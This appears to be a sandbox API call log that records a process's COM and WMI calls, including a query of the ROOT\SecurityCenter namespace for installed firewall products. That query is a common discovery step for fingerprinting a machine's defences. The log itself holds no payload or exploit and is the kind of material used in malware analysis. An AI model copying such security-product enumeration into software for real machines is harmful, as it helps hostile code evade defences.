WbemLocator:IUnknown:QueryInterface (in: This=0x54b56d0, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff4 | out: ppvObject=0x19eff4*=0x66fb70) returned 0x0 [0266.350] WbemLocator:IUnknown:QueryInterface (in: This=0x54b56d0, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff0 | out: ppvObject=0x19eff0*=0x66fb4c) returned 0x0 [0266.350] WbemLocator:IClientSecurity:SetBlanket (This=0x66fb4c, pProxy=0x54b56d0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.351] WbemLocator:IUnknown:Release (This=0x66fb4c) returned 0x2 [0266.351] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x1 [0266.351] CoTaskMemFree (pv=0x54bc658) [0266.351] WbemLocator:IUnknown:Release (This=0x54ba1d8) returned 0x0 [0266.351] WbemLocator:IUnknown:QueryInterface (in: This=0x54b56d0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebf0 | out: ppvObject=0x19ebf0*=0x66fb70) returned 0x0 [0266.351] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ebac | out: ppvObject=0x19ebac*=0x0) returned 0x80004002 [0266.352] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e9cc | out: ppvObject=0x19e9cc*=0x0) returned 0x80004002 [0266.352] WbemLocator:IUnknown:QueryInterface (in: This=0x54b56d0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e7a4 | out: ppvObject=0x19e7a4*=0x0) returned 0x80004002 [0266.353] WbemLocator:IUnknown:AddRef (This=0x66fb70) returned 0x3 [0266.353] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e50c | out: ppvObject=0x19e50c*=0x0) returned 0x80004002 [0266.353] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e4bc | out: ppvObject=0x19e4bc*=0x0) returned 0x80004002 [0266.353] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4c8 | out: ppvObject=0x19e4c8*=0x66facc) returned 0x0 [0266.353] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66facc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e4d0 | out: pCid=0x19e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.353] WbemLocator:IUnknown:Release (This=0x66facc) returned 0x3 [0266.353] CoGetContextToken (in: pToken=0x19e528 | out: pToken=0x19e528) returned 0x0 [0266.353] CoGetContextToken (in: pToken=0x19e930 | out: pToken=0x19e930) returned 0x0 [0266.353] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9c0 | out: ppvObject=0x19e9c0*=0x66fb54) returned 0x0 [0266.353] WbemLocator:IRpcOptions:Query (in: This=0x66fb54, pPrx=0x66fb70, dwProperty=2, pdwValue=0x19e9e8 | out: pdwValue=0x19e9e8) returned 0x80004002 [0266.353] WbemLocator:IUnknown:Release (This=0x66fb54) returned 0x3 [0266.354] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x2 [0266.354] CoGetContextToken (in: pToken=0x19ef00 | out: pToken=0x19ef00) returned 0x0 [0266.354] CoGetContextToken (in: pToken=0x19ee60 | out: pToken=0x19ee60) returned 0x0 [0266.354] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x19ef30*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ef2c | out: ppvObject=0x19ef2c*=0x54b56d0) returned 0x0 [0266.354] WbemLocator:IUnknown:AddRef (This=0x54b56d0) returned 0x4 [0266.354] WbemLocator:IUnknown:Release (This=0x54b56d0) returned 0x3 [0266.354] WbemLocator:IUnknown:Release (This=0x54b56d0) returned 0x2 [0266.354] SysStringLen (param_1=0x0) returned 0x0 [0266.354] CoGetContextToken (in: pToken=0x19ef10 | out: pToken=0x19ef10) returned 0x0 [0266.354] WbemLocator:IUnknown:AddRef (This=0x66fb70) returned 0x3 [0266.354] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eda4 | out: ppvObject=0x19eda4*=0x66fb70) returned 0x0 [0266.354] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x3 [0266.354] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x2 [0266.355] CoGetContextToken (in: pToken=0x19f008 | out: pToken=0x19f008) returned 0x0 [0266.355] WbemLocator:IUnknown:AddRef (This=0x54b56d0) returned 0x3 [0266.355] IWbemServices:ExecQuery (in: This=0x54b56d0, strQueryLanguage="WQL", strQuery="SELECT * FROM FirewallProduct", lFlags=16, pCtx=0x0, ppEnum=0x19f214 | out: ppEnum=0x19f214*=0x663848) returned 0x0 [0266.366] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f078 | out: ppvObject=0x19f078*=0x66384c) returned 0x0 [0266.366] IClientSecurity:QueryBlanket (in: This=0x66384c, pProxy=0x663848, pAuthnSvc=0x19f0c8, pAuthzSvc=0x19f0c4, pServerPrincName=0x19f0bc, pAuthnLevel=0x19f0c0, pImpLevel=0x19f0b0, pAuthInfo=0x19f0b4, pCapabilites=0x19f0b8 | out: pAuthnSvc=0x19f0c8*=0xa, pAuthzSvc=0x19f0c4*=0x0, pServerPrincName=0x19f0bc, pAuthnLevel=0x19f0c0*=0x6, pImpLevel=0x19f0b0*=0x2, pAuthInfo=0x19f0b4, pCapabilites=0x19f0b8*=0x1) returned 0x0 [0266.366] IUnknown:Release (This=0x66384c) returned 0x1 [0266.366] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f06c | out: ppvObject=0x19f06c*=0x66ea70) returned 0x0 [0266.366] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x66384c) returned 0x0 [0266.366] IClientSecurity:SetBlanket (This=0x66384c, pProxy=0x663848, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.369] IUnknown:Release (This=0x66384c) returned 0x2 [0266.369] WbemLocator:IUnknown:Release (This=0x66ea70) returned 0x1 [0266.369] CoTaskMemFree (pv=0x54bc508) [0266.369] IUnknown:QueryInterface (in: This=0x663848, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec64 | out: ppvObject=0x19ec64*=0x66ea70) returned 0x0 [0266.370] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec20 | out: ppvObject=0x19ec20*=0x0) returned 0x80004002 [0266.370] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x0) returned 0x80004002 [0266.370] IUnknown:QueryInterface (in: This=0x663848, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0266.371] WbemLocator:IUnknown:AddRef (This=0x66ea70) returned 0x3 [0266.371] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e57c | out: ppvObject=0x19e57c*=0x0) returned 0x80004002 [0266.371] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e52c | out: ppvObject=0x19e52c*=0x0) returned 0x80004002 [0266.371] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e538 | out: ppvObject=0x19e538*=0x66e9cc) returned 0x0 [0266.371] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66e9cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e540 | out: pCid=0x19e540*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.371] WbemLocator:IUnknown:Release (This=0x66e9cc) returned 0x3 [0266.371] CoGetContextToken (in: pToken=0x19e598 | out: pToken=0x19e598) returned 0x0 [0266.371] CoGetContextToken (in: pToken=0x19e9a0 | out: pToken=0x19e9a0) returned 0x0 [0266.371] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea30 | out: ppvObject=0x19ea30*=0x66ea54) returned 0x0 [0266.371] WbemLocator:IRpcOptions:Query (in: This=0x66ea54, pPrx=0x66ea70, dwProperty=2, pdwValue=0x19ea58 | out: pdwValue=0x19ea58) returned 0x80004002 [0266.371] WbemLocator:IUnknown:Release (This=0x66ea54) returned 0x3 [0266.371] WbemLocator:IUnknown:Release (This=0x66ea70) returned 0x2 [0266.371] CoGetContextToken (in: pToken=0x19ef78 | out: pToken=0x19ef78) returned 0x0 [0266.371] CoGetContextToken (in: pToken=0x19eed8 | out: pToken=0x19eed8) returned 0x0 [0266.371] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x19efa8*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19efa4 | out: ppvObject=0x19efa4*=0x663848) returned 0x0 [0266.371] IUnknown:AddRef (This=0x663848) returned 0x4 [0266.371] IUnknown:Release (This=0x663848) returned 0x3 [0266.371] IUnknown:Release (This=0x663848) returned 0x2 [0266.372] WbemLocator:IUnknown:Release (This=0x54b56d0) returned 0x2 [0266.372] SysStringLen (param_1=0x0) returned 0x0 [0266.372] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542350, puCount=0x19f260 | out: puCount=0x19f260*=0x2) returned 0x0 [0266.372] WbemDefPath:IWbemPath:GetText (in: This=0x5542350, lFlags=4, puBuffLength=0x19f25c*=0x0, pszText=0x0 | out: puBuffLength=0x19f25c*=0x18, pszText=0x0) returned 0x0 [0266.372] WbemDefPath:IWbemPath:GetText (in: This=0x5542350, lFlags=4, puBuffLength=0x19f25c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f25c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.372] CoGetContextToken (in: pToken=0x19f0b0 | out: pToken=0x19f0b0) returned 0x0 [0266.372] IUnknown:AddRef (This=0x663848) returned 0x3 [0266.372] IEnumWbemClassObject:Clone (in: This=0x663848, ppEnum=0x19f26c | out: ppEnum=0x19f26c*=0x663910) returned 0x0 [0266.373] IUnknown:QueryInterface (in: This=0x663910, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f130 | out: ppvObject=0x19f130*=0x663914) returned 0x0 [0266.373] IClientSecurity:QueryBlanket (in: This=0x663914, pProxy=0x663910, pAuthnSvc=0x19f180, pAuthzSvc=0x19f17c, pServerPrincName=0x19f174, pAuthnLevel=0x19f178, pImpLevel=0x19f168, pAuthInfo=0x19f16c, pCapabilites=0x19f170 | out: pAuthnSvc=0x19f180*=0xa, pAuthzSvc=0x19f17c*=0x0, pServerPrincName=0x19f174, pAuthnLevel=0x19f178*=0x6, pImpLevel=0x19f168*=0x2, pAuthInfo=0x19f16c, pCapabilites=0x19f170*=0x1) returned 0x0 [0266.373] IUnknown:Release (This=0x663914) returned 0x1 [0266.373] IUnknown:QueryInterface (in: This=0x663910, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f124 | out: ppvObject=0x19f124*=0x66f970) returned 0x0 [0266.373] IUnknown:QueryInterface (in: This=0x663910, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f120 | out: ppvObject=0x19f120*=0x663914) returned 0x0 [0266.373] IClientSecurity:SetBlanket (This=0x663914, pProxy=0x663910, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.374] IUnknown:Release (This=0x663914) returned 0x2 [0266.374] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x1 [0266.374] CoTaskMemFree (pv=0x54bc538) [0266.375] IUnknown:QueryInterface (in: This=0x663910, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed0c | out: ppvObject=0x19ed0c*=0x66f970) returned 0x0 [0266.375] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ecc8 | out: ppvObject=0x19ecc8*=0x0) returned 0x80004002 [0266.375] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x0) returned 0x80004002 [0266.375] IUnknown:QueryInterface (in: This=0x663910, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e8bc | out: ppvObject=0x19e8bc*=0x0) returned 0x80004002 [0266.376] WbemLocator:IUnknown:AddRef (This=0x66f970) returned 0x3 [0266.376] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e624 | out: ppvObject=0x19e624*=0x0) returned 0x80004002 [0266.376] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x0) returned 0x80004002 [0266.376] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5e0 | out: ppvObject=0x19e5e0*=0x66f8cc) returned 0x0 [0266.376] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f8cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e5e8 | out: pCid=0x19e5e8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.376] WbemLocator:IUnknown:Release (This=0x66f8cc) returned 0x3 [0266.376] CoGetContextToken (in: pToken=0x19e640 | out: pToken=0x19e640) returned 0x0 [0266.376] CoGetContextToken (in: pToken=0x19ea48 | out: pToken=0x19ea48) returned 0x0 [0266.377] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ead8 | out: ppvObject=0x19ead8*=0x66f954) returned 0x0 [0266.377] WbemLocator:IRpcOptions:Query (in: This=0x66f954, pPrx=0x66f970, dwProperty=2, pdwValue=0x19eb00 | out: pdwValue=0x19eb00) returned 0x80004002 [0266.377] WbemLocator:IUnknown:Release (This=0x66f954) returned 0x3 [0266.377] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x2 [0266.377] CoGetContextToken (in: pToken=0x19f020 | out: pToken=0x19f020) returned 0x0 [0266.377] CoGetContextToken (in: pToken=0x19ef80 | out: pToken=0x19ef80) returned 0x0 [0266.377] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x19f050*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f04c | out: ppvObject=0x19f04c*=0x663910) returned 0x0 [0266.377] IUnknown:AddRef (This=0x663910) returned 0x4 [0266.377] IUnknown:Release (This=0x663910) returned 0x3 [0266.377] IUnknown:Release (This=0x663910) returned 0x2 [0266.377] IUnknown:Release (This=0x663848) returned 0x2 [0266.377] SysStringLen (param_1=0x0) returned 0x0 [0266.377] IEnumWbemClassObject:Reset (This=0x663910) returned 0x0 [0266.378] CoTaskMemAlloc (cb=0x4) returned 0x54ba478 [0266.378] IEnumWbemClassObject:Next (in: This=0x663910, lTimeout=-1, uCount=0x1, apObjects=0x54ba478, puReturned=0x23fe708 | out: apObjects=0x54ba478*=0x0, puReturned=0x23fe708*=0x0) returned 0x1 [0266.379] CoTaskMemFree (pv=0x54ba478) [0266.379] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.379] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x1 [0266.379] IUnknown:Release (This=0x663910) returned 0x0 [0266.380] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.380] WbemLocator:IUnknown:Release (This=0x66ea70) returned 0x1 [0266.380] IUnknown:Release (This=0x663848) returned 0x0 [0266.382] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f288 | out: ppv=0x19f288*=0x601a94) returned 0x0 [0266.382] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f280 | out: pAptType=0x19f280*=1) returned 0x0 [0266.382] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f284 | out: ppvObject=0x19f284*=0x0) returned 0x80004002 [0266.382] IUnknown:Release (This=0x601a94) returned 0x1 [0266.383] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ebf0 | out: ppv=0x19ebf0*=0x54ba428) returned 0x0 [0266.383] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba428, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ee08 | out: ppvObject=0x19ee08*=0x0) returned 0x80004002 [0266.383] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba428, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee1c | out: ppvObject=0x19ee1c*=0x5542970) returned 0x0 [0266.384] WbemDefPath:IUnknown:Release (This=0x54ba428) returned 0x0 [0266.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542970, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x5542970) returned 0x0 [0266.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542970, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9f8 | out: ppvObject=0x19e9f8*=0x0) returned 0x80004002 [0266.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542970, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e5ec | out: ppvObject=0x19e5ec*=0x0) returned 0x80004002 [0266.384] WbemDefPath:IUnknown:AddRef (This=0x5542970) returned 0x3 [0266.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542970, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e354 | out: ppvObject=0x19e354*=0x0) returned 0x80004002 [0266.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542970, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e304 | out: ppvObject=0x19e304*=0x0) returned 0x80004002 [0266.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542970, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e310 | out: ppvObject=0x19e310*=0x55449d8) returned 0x0 [0266.385] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55449d8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e318 | out: pCid=0x19e318*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.385] WbemDefPath:IUnknown:Release (This=0x55449d8) returned 0x3 